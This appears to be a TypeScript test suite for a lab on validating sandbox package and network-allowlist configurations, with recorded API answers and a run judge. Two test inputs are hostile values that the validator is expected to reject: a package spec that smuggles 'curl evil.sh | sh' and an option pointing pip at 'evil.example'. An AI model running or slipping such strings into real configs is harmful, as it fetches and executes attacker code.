// Lab 28: the test page. Every case runs the real functions (buildEnvironment, fingerprint, checkPackage, checkDomain,
// checkRequest, checkConfig, parseAudit, hostEvidence, installEvidence, classifyError, parseConfigRun, judgeConfigRun,
// policyDocument) on fixed inputs: no network, no API key.
import {
  buildEnvironment, checkConfig, checkDomain, checkPackage, checkRequest, classifyError, expectedAudit, fingerprint, hostEvidence, installEvidence, isPinned,
  judgeConfigRun, packageName, parseAudit, parseConfigRun, policyDocument, presets, provisionReason, type ConfigRun,
} from './lab28Packages.ts';
import { requestSamples, samples } from './lab28Scenarios.ts';

export type TestGroup = 'config' | 'request' | 'evidence' | 'judge' | 'policy';
export type PackageTest = { id: string; label: string; group: TestGroup; expect: string; note: string; run: () => { got: string; detail: string } };
export type TestResult = { id: string; got: string; detail: string; pass: boolean };

const levelOf = (findings: Array<{ level: string }>) => (findings.some((item) => item.level === 'error') ? 'error' : findings.some((item) => item.level === 'warn') ? 'warn' : 'ok');
const lines = (findings: Array<{ level: string; text: string }>) => findings.map((item) => `${item.level}: ${item.text}`).join('\n') || 'no findings';
const checked = (environment: unknown) => { const out = checkRequest(environment); return { got: levelOf(out.findings), detail: lines(out.findings) }; };
const hosted = (extra: Record<string, unknown>) => ({ type: 'openai_hosted', network: { access: 'disabled' }, ...extra });
const sample = (id: string) => samples.find((item) => item.id === id)!.run;
const judged = (run: ConfigRun) => { const verdict = judgeConfigRun(run); return { got: verdict.outcome, detail: `${verdict.title}: ${verdict.text}\n${verdict.checks.map((check) => `${check.level} · ${check.label}: ${check.detail}`).join('\n')}` }; };
const recorded = (id: string) => { const item = requestSamples.find((entry) => entry.id === id)!; const out = checkRequest(item.environment); return { got: out.environment ? 'accepted' : 'refused', detail: `API: ${item.status} ${item.response.slice(0, 200)}\n${lines(out.findings)}` }; };
const pinned = sample('pinned2');
const variant = (patch: Partial<ConfigRun>): ConfigRun => ({ ...pinned, ...patch });
const withAnswer = (patch: Record<string, string>) => {
  const value = { python: 'Python 3.12.12', tabulate: '0.9.0', jq: 'jq-1.6', lock_file: 'present', pypi: 'blocked', example: 'blocked', ...patch };
  return Object.entries(value).map(([key, text]) => `${key}: ${text}`).join('\n');
};

export const packageTests: PackageTest[] = [
  { id: 'build-pinned', label: 'The pinned preset', group: 'config', expect: 'packages · setup · disabled', note: 'tabulate==0.9.0 and jq, a lock-file setup command, and no network.', run: () => { const env = buildEnvironment(presets.pinned.config); return { got: `${env.packages ? 'packages' : '-'} · ${env.setup_commands ? 'setup' : '-'} · ${env.network.access}`, detail: JSON.stringify(env, null, 2) }; } },
  { id: 'build-bare', label: 'The control preset', group: 'config', expect: '{"type":"openai_hosted","network":{"access":"disabled"}}', note: 'Empty lists are left out, not sent as [].', run: () => ({ got: JSON.stringify(buildEnvironment(presets.bare.config)), detail: 'buildEnvironment(presets.bare.config)' }) },
  { id: 'build-install', label: 'The install task drops packages', group: 'config', expect: 'no packages · no setup', note: 'Otherwise pip would find tabulate already installed and never touch the network.', run: () => { const env = buildEnvironment(presets.restricted.config, 'install'); return { got: `${env.packages ? 'packages' : 'no packages'} · ${env.setup_commands ? 'setup' : 'no setup'}`, detail: JSON.stringify(env, null, 2) }; } },
  { id: 'build-domains', label: 'Domains only when restricted', group: 'config', expect: '{"access":"disabled"}', note: 'The API refuses allowed_domains with disabled (live 400), so the builder never sends them.', run: () => { const out = checkConfig({ ...presets.pinned.config, domains: ['pypi.org'] }); return { got: JSON.stringify(buildEnvironment(out.config!).network), detail: lines(out.findings) }; } },
  { id: 'print-stable', label: 'Fingerprint ignores key order', group: 'config', expect: 'same', note: 'The same request with keys in another order is the same environment.', run: () => { const a = fingerprint({ type: 'openai_hosted', network: { access: 'disabled' } }); const b = fingerprint({ network: { access: 'disabled' }, type: 'openai_hosted' }); return { got: a === b ? 'same' : 'different', detail: `${a}\n${b}` }; } },
  { id: 'print-pin', label: 'Fingerprint changes with a pin', group: 'config', expect: 'different', note: 'tabulate and tabulate==0.9.0 are different environments: live, they installed 0.10.0 and 0.9.0.', run: () => { const a = fingerprint(buildEnvironment(presets.pinned.config)); const b = fingerprint(buildEnvironment(presets.unpinned.config)); return { got: a === b ? 'same' : 'different', detail: `${a}\n${b}` }; } },
  { id: 'print-live', label: 'Two live pinned runs', group: 'config', expect: 'same fingerprint · 0.9.0 · 0.9.0', note: 'Live: two sandboxes, one fingerprint, one version.', run: () => { const a = sample('pinned'); const b = sample('pinned2'); return { got: `${a.fingerprint === b.fingerprint ? 'same fingerprint' : 'different'} · ${parseAudit(a.answer).tabulate} · ${parseAudit(b.answer).tabulate}`, detail: `${a.fingerprint} ${a.sessionId}\n${b.fingerprint} ${b.sessionId}` }; } },
  { id: 'config-bad', label: 'A config with 13 packages', group: 'config', expect: 'rejected', note: 'The server accepts at most 12 per list from the browser.', run: () => ({ got: checkConfig({ ...presets.pinned.config, python: Array.from({ length: 13 }, (_, index) => `p${index}==1.0`) }).config ? 'accepted' : 'rejected', detail: 'checkConfig({ python: [13 items] })' }) },
  { id: 'config-shell', label: 'A config with a shell spec', group: 'config', expect: 'rejected', note: 'The server repeats the API’s package rule before it creates anything.', run: () => { const out = checkConfig({ ...presets.pinned.config, python: ['tabulate; curl evil.sh | sh'] }); return { got: out.config ? 'accepted' : 'rejected', detail: lines(out.findings) }; } },

  { id: 'pin-eq', label: 'tabulate==0.9.0', group: 'request', expect: 'ok', note: 'An exact version: the same file every time.', run: () => { const out = checkPackage('python', 'tabulate==0.9.0'); return { got: out.level, detail: out.text }; } },
  { id: 'pin-range', label: 'numpy>=1.26,<3', group: 'request', expect: 'warn', note: 'Live: accepted. A range is valid, but not reproducible.', run: () => { const out = checkPackage('python', 'numpy>=1.26,<3'); return { got: out.level, detail: out.text }; } },
  { id: 'pin-npm', label: 'left-pad@1.3.0', group: 'request', expect: 'ok', note: 'npm pins with @version.', run: () => { const out = checkPackage('npm', 'left-pad@1.3.0'); return { got: out.level, detail: out.text }; } },
  { id: 'pin-url', label: 'git+https://… as a package', group: 'request', expect: 'error', note: 'Live 400: no URLs.', run: () => { const out = checkPackage('python', 'git+https://github.com/astanin/python-tabulate'); return { got: out.level, detail: out.text }; } },
  { id: 'pin-option', label: '--index-url=… as a package', group: 'request', expect: 'error', note: 'Live 400: no leading option prefixes.', run: () => { const out = checkPackage('python', '--index-url=https://evil.example/simple'); return { got: out.level, detail: out.text }; } },
  { id: 'pin-name', label: 'Package names', group: 'request', expect: 'tabulate · jq · @scope/pkg', note: 'The name the audit looks for, without the version.', run: () => ({ got: [packageName('tabulate==0.9.0'), packageName('jq'), packageName('@scope/pkg@1.2.3')].join(' · '), detail: `isPinned npm @scope/pkg@1.2.3: ${isPinned('npm', '@scope/pkg@1.2.3')}` }) },
  { id: 'dom-ok', label: 'files.pythonhosted.org', group: 'request', expect: 'ok', note: 'A host name, with the reason it is on the list.', run: () => { const out = checkDomain('files.pythonhosted.org'); return { got: out.level, detail: out.text }; } },
  { id: 'dom-port', label: 'pypi.org:443', group: 'request', expect: 'error', note: 'Live 400: contains an invalid host.', run: () => { const out = checkDomain('pypi.org:443'); return { got: out.level, detail: out.text }; } },
  { id: 'dom-upper', label: 'PyPI.org', group: 'request', expect: 'warn', note: 'Live: accepted and echoed as written.', run: () => { const out = checkDomain('PyPI.org'); return { got: out.level, detail: out.text }; } },
  { id: 'req-pypi-only', label: 'Allowlist with pypi.org only', group: 'request', expect: 'warn', note: 'Accepted, but pip cannot download: the files are on another host.', run: () => checked({ type: 'openai_hosted', network: { access: 'restricted', allowed_domains: ['pypi.org'] } }) },
  { id: 'req-nonet', label: 'No network field', group: 'request', expect: 'warn', note: 'Beta requests default to enabled.', run: () => checked({ type: 'openai_hosted' }) },
  { id: 'req-pinned', label: 'Recorded: pinned packages + setup', group: 'request', expect: 'accepted', note: 'Live 200. The echo left the setup command out.', run: () => recorded('pinned') },
  { id: 'req-wildcard', label: 'Recorded: *.pypi.org', group: 'request', expect: 'refused', note: 'Live 400: wildcards are not supported.', run: () => recorded('wildcard') },
  { id: 'req-blocked', label: 'Recorded: blocked_domains', group: 'request', expect: 'refused', note: 'Live 400: not enabled for this organization.', run: () => recorded('blocked') },
  { id: 'req-disabled', label: 'Recorded: disabled + domains', group: 'request', expect: 'refused', note: 'Live 400: a contradictory policy.', run: () => recorded('disabled-domains') },
  { id: 'req-pip', label: 'Recorded: packages.pip', group: 'request', expect: 'refused', note: 'Live 400: Unknown parameter.', run: () => recorded('pip') },
  { id: 'req-setup', label: 'Recorded: 51 setup commands', group: 'request', expect: 'refused', note: 'Live 400: at most 16.', run: () => recorded('setup-17') },
  { id: 'req-setup-install', label: 'pip install in a setup command', group: 'request', expect: 'warn', note: 'It works, but the version is not echoed or checked: use packages.', run: () => checked(hosted({ setup_commands: [{ command: 'pip install tabulate' }] })) },
  { id: 'req-all', label: 'Every recorded answer', group: 'request', expect: `${requestSamples.length}/${requestSamples.length}`, note: 'The checker accepts exactly the requests the API accepted.', run: () => { const agree = requestSamples.filter((item) => Boolean(checkRequest(item.environment).environment) === (item.status === 200)); return { got: `${agree.length}/${requestSamples.length}`, detail: requestSamples.map((item) => `${item.status} ${item.id}: ${checkRequest(item.environment).environment ? 'accepted' : 'refused'}`).join('\n') }; } },

  { id: 'ev-labels', label: 'A labelled combined command', group: 'evidence', expect: '200 · 000', note: 'Live (restricted): --PYPI-- 200, --EXAMPLE-- 000curl: (56) CONNECT tunnel failed, response 403.', run: () => { const run = sample('restricted'); return { got: `${hostEvidence(run.commands, 'pypi').code} · ${hostEvidence(run.commands, 'example').code}`, detail: run.commands[0]?.output ?? '' }; } },
  { id: 'ev-order', label: 'An unlabelled combined command', group: 'evidence', expect: '000 · 000', note: 'Live (control): the 403 in curl’s error line is the proxy, not a status code.', run: () => { const run = sample('bare'); return { got: `${hostEvidence(run.commands, 'pypi').code} · ${hostEvidence(run.commands, 'example').code}`, detail: run.commands[0]?.output ?? '' }; } },
  { id: 'ev-separate', label: 'One command per host', group: 'evidence', expect: '200 · 200', note: 'Live (enabled): two curl commands.', run: () => { const run = sample('enabled'); return { got: `${hostEvidence(run.commands, 'pypi').code} · ${hostEvidence(run.commands, 'example').code}`, detail: run.commands.map((command) => command.output).join('\n---\n') }; } },
  { id: 'ev-mislabel', label: '“reachable (000)”', group: 'evidence', expect: 'blocked · mislabeled', note: 'Live: the agent’s own script printed the wrong word next to the right code.', run: () => { const out = hostEvidence(sample('pinned').commands, 'pypi'); return { got: `${out.reach} · ${out.mislabeled ? 'mislabeled' : 'labelled right'}`, detail: sample('pinned').commands[0]?.output ?? '' }; } },
  { id: 'ev-audit', label: 'Read the six audit lines', group: 'evidence', expect: '3.12.12 · 0.9.0 · 1.6 · present · reachable · blocked', note: 'Markdown and prefixes such as “jq-” are tolerated.', run: () => { const out = parseAudit('**python:** `Python 3.12.12`\n- tabulate: 0.9.0\njq: jq-1.6\nlock_file: present\npypi: reachable (200)\nexample: blocked'); return { got: `${out.python} · ${out.tabulate} · ${out.jq} · ${out.lockFile} · ${out.pypi} · ${out.example}`, detail: JSON.stringify(out, null, 2) }; } },
  { id: 'ev-pip', label: 'The host pip could not reach', group: 'evidence', expect: 'files.pythonhosted.org', note: 'Live: HTTPSConnectionPool(host=\'files.pythonhosted.org\', port=443) … Tunnel connection failed: 403.', run: () => { const out = installEvidence(sample('installOne').commands); return { got: out.blockedHost ?? 'none', detail: out.command?.output?.slice(-600) ?? '' }; } },
  { id: 'ev-provision', label: 'Why provisioning failed', group: 'evidence', expect: 'provision · No matching distribution found for lab28-no-such-package-xyz==9.9.9', note: 'Live: the stream ended with pip’s own message.', run: () => { const error = sample('typo').error ?? ''; return { got: `${classifyError(error)} · ${provisionReason(error)}`, detail: error }; } },
  { id: 'ev-expected', label: 'What the restricted policy predicts', group: 'evidence', expect: '0.9.0 · present · reachable · blocked', note: 'The judge derives every expectation from the configuration, not from a mode name.', run: () => { const out = expectedAudit(presets.restricted.config); return { got: `${out.tabulate} · ${out.jq} · ${out.pypi} · ${out.example}`, detail: JSON.stringify(out, null, 2) }; } },
  { id: 'ev-parse', label: 'A malformed summary', group: 'evidence', expect: 'audit · disabled · 0', note: 'The browser does not trust the server’s JSON blindly.', run: () => { const out = parseConfigRun({ task: 'hack', config: { access: 'wide open' }, commands: 'x' }); return { got: `${out.task} · ${out.config.access} · ${out.commands.length}`, detail: JSON.stringify(out, null, 2).slice(0, 800) }; } },

  { id: 'j-pinned', label: 'Recorded: pinned, offline', group: 'judge', expect: 'reproducible', note: 'Live: 0.9.0, jq-1.6, lock file listed, both hosts 000.', run: () => judged(pinned) },
  { id: 'j-unpinned', label: 'Recorded: unpinned', group: 'judge', expect: 'drift', note: 'Live: tabulate 0.10.0.', run: () => judged(sample('unpinned')) },
  { id: 'j-restricted', label: 'Recorded: PyPI allowlist', group: 'judge', expect: 'reproducible', note: 'Live: pypi.org 200, example.com 000.', run: () => judged(sample('restricted')) },
  { id: 'j-enabled', label: 'Recorded: open network', group: 'judge', expect: 'open', note: 'Live: both 200.', run: () => judged(sample('enabled')) },
  { id: 'j-bare', label: 'Recorded: control', group: 'judge', expect: 'baseline', note: 'Live: nothing installed, nothing reachable.', run: () => judged(sample('bare')) },
  { id: 'j-typo', label: 'Recorded: package that does not exist', group: 'judge', expect: 'failed', note: 'Live: no environment.ready.', run: () => judged(sample('typo')) },
  { id: 'j-typo2', label: 'Recorded: the same typo, generic failure', group: 'judge', expect: 'Package installation failed', note: 'Live: only “The environment failed to connect.” Packages were the only thing to prepare.', run: () => { const verdict = judgeConfigRun(sample('typo2')); return { got: verdict.title, detail: `${verdict.outcome}: ${verdict.text}` }; } },
  { id: 'j-broken', label: 'Recorded: failing setup command', group: 'judge', expect: 'failed', note: 'Live: environment_connection_failed, and no word about setup.', run: () => judged(sample('broken')) },
  { id: 'j-install-one', label: 'Recorded: install, pypi.org only', group: 'judge', expect: 'blocked', note: 'Live: the download host was refused.', run: () => judged(sample('installOne')) },
  { id: 'j-install-both', label: 'Recorded: install, both hosts', group: 'judge', expect: 'installed', note: 'Live: Successfully installed tabulate-0.9.0.', run: () => judged(sample('installBoth')) },
  { id: 'j-misreport', label: 'Reply says reachable, curl printed 000', group: 'judge', expect: 'misreported', note: 'The command output wins over the reply.', run: () => judged(variant({ answer: withAnswer({ pypi: 'reachable' }) })) },
  { id: 'j-wrong-version', label: 'Pinned 0.9.0, reply says 0.8.10', group: 'judge', expect: 'breach', note: 'Not what was declared.', run: () => judged(variant({ answer: withAnswer({ tabulate: '0.8.10' }) })) },
  { id: 'j-leak', label: 'Disabled, but example.com answered 200', group: 'judge', expect: 'breach', note: 'A host the policy blocks must not answer.', run: () => judged(variant({ answer: withAnswer({ example: 'reachable' }), commands: [...pinned.commands.map((command) => ({ ...command, command: command.command.replace('https://example.com/', 'https://example.org/') })), { id: 'exec_leak', command: "curl -sS -m 8 -o /dev/null -w '%{http_code}' https://example.com/", cwd: '/workspace', exitCode: 0, durationMs: 0, status: 'completed', output: '200' }] })) },
  { id: 'j-short', label: 'Two of six lines', group: 'judge', expect: 'incomplete', note: 'The audit is the evidence; a partial one is not enough.', run: () => judged(variant({ answer: 'python: Python 3.12.12\ntabulate: 0.9.0' })) },
  { id: 'j-billing', label: 'Refused by a billing limit', group: 'judge', expect: 'failed', note: 'Errors first: nothing else is judged.', run: () => judged(variant({ turnStatus: 'failed', commands: [], answer: '', error: 'Your organization has reached a usage or billing limit.', errorKind: 'account' })) },

  { id: 'doc-restricted', label: 'Policy document for the allowlist', group: 'policy', expect: 'reasons · verified · json', note: 'Each allowed host has a reason, the sandbox’s answers, and the request to reproduce it.', run: () => { const doc = policyDocument(sample('restricted'), '2026-09-28'); return { got: [doc.includes('where pip downloads') && 'reasons', doc.includes('| `example.com` | blocked | 000 → blocked |') && 'verified', doc.includes('"allowed_domains"') && 'json'].filter(Boolean).join(' · '), detail: doc }; } },
  { id: 'doc-unknown', label: 'An unknown host', group: 'policy', expect: 'asks for a reason', note: 'A policy that cannot say why a host is allowed is not documented.', run: () => { const doc = policyDocument({ config: { ...presets.restricted.config, domains: ['api.example.net'] }, task: 'audit' }, '2026-09-28'); return { got: doc.includes('_state why the task needs this host_') ? 'asks for a reason' : 'silent', detail: doc }; } },
  { id: 'doc-setup', label: 'Setup is recorded in the document', group: 'policy', expect: 'recorded', note: 'The API never echoes setup bodies, so the document must hold them.', run: () => { const doc = policyDocument({ config: presets.pinned.config, task: 'audit' }, '2026-09-28'); return { got: doc.includes('pip freeze') ? 'recorded' : 'missing', detail: doc }; } },
];

export function runPackageSuite(): TestResult[] {
  return packageTests.map((test) => {
    try {
      const { got, detail } = test.run();
      return { id: test.id, got, detail, pass: got === test.expect };
    } catch (error) {
      return { id: test.id, got: 'threw', detail: error instanceof Error ? error.stack ?? error.message : String(error), pass: false };
    }
  });
}
